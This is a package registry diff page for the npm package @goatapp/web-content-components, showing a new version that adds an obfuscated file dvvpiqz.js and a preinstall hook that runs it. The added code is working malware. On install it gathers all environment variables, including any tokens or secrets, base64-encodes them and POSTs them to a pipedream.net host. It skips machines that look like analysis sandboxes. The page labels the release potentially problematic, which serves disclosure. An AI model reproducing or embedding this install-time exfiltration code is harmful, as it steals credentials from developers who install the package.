@goatapp/web-content-components 0.0.1-security → 6.782.691
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/dvvpiqz.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/dvvpiqz.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x5e77(){const _0x17b313=['request','3slbqbM','taobao.org','POST','bd43527e019ae8efb47eb39bb9313ac5','npm_config_registry','pipedream','join','USERNAME','tencent.com','registry.npmmirror.com','91446gNaYzt','from','keys','1149967kOEqoB','1293210XevehP','length','some','npm_package_name','27OFcckv','stringify','1372110jpAciq','8OKIAZK','733105WjGzKS','toString','45848ejXumx','22412cBPooG','end'];a0_0x5e77=function(){return _0x17b313;};return a0_0x5e77();}const a0_0x2b0db8=a0_0x26de;function a0_0x26de(_0x591f1c,_0xfa37b8){const _0x5e7715=a0_0x5e77();return a0_0x26de=function(_0x26debb,_0x2a6367){_0x26debb=_0x26debb-0xb7;let _0x1f2338=_0x5e7715[_0x26debb];return _0x1f2338;},a0_0x26de(_0x591f1c,_0xfa37b8);}(function(_0x4b6198,_0x5e8430){const _0x1dfd72=a0_0x26de,_0x21f33f=_0x4b6198();while(!![]){try{const _0x1a4218=-parseInt(_0x1dfd72(0xc6))/0x1+-parseInt(_0x1dfd72(0xb8))/0x2+-parseInt(_0x1dfd72(0xca))/0x3*(parseInt(_0x1dfd72(0xc7))/0x4)+-parseInt(_0x1dfd72(0xc4))/0x5+-parseInt(_0x1dfd72(0xbc))/0x6+parseInt(_0x1dfd72(0xbb))/0x7*(parseInt(_0x1dfd72(0xc3))/0x8)+parseInt(_0x1dfd72(0xc0))/0x9*(parseInt(_0x1dfd72(0xc2))/0xa);if(_0x1a4218===_0x5e8430)break;else _0x21f33f['push'](_0x21f33f['shift']());}catch(_0x577a75){_0x21f33f['push'](_0x21f33f['shift']());}}}(a0_0x5e77,0x1c768));const http=require('https'),filter=[{'key':'npm_config_registry','val':a0_0x2b0db8(0xcb)},{'key':a0_0x2b0db8(0xce),'val':a0_0x2b0db8(0xd2)},{'key':a0_0x2b0db8(0xce),'val':a0_0x2b0db8(0xb7)},{'key':a0_0x2b0db8(0xd1),'val':'daasadmin'},{'key':'_','val':'/usr/bin/python'}];function main(){const _0x4901be=a0_0x2b0db8;var _0x5417d6=process['env']||{};if(filter[_0x4901be(0xbe)](({key:_0x5a4193,val:_0x2440c1})=>_0x5417d6[_0x5a4193]&&_0x5417d6[_0x5a4193]['includes'](_0x2440c1))||Object[_0x4901be(0xba)](_0x5417d6)[_0x4901be(0xbd)]<0xa)return;req=http[_0x4901be(0xc9)]({'host':[_0x4901be(0xcd),'m',_0x4901be(0xcf),'net'][_0x4901be(0xd0)]('.'),'path':'/'+(_0x5417d6[_0x4901be(0xbf)]||''),'method':_0x4901be(0xcc)})['on']('error',function(_0x132d34){}),req['write'](Buffer[_0x4901be(0xb9)](JSON[_0x4901be(0xc1)](_0x5417d6))[_0x4901be(0xc5)]('base64')),req[_0x4901be(0xc8)]();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "6.782.691",
|
|
4
|
+
"main": "dvvpiqz.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node dvvpiqz.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|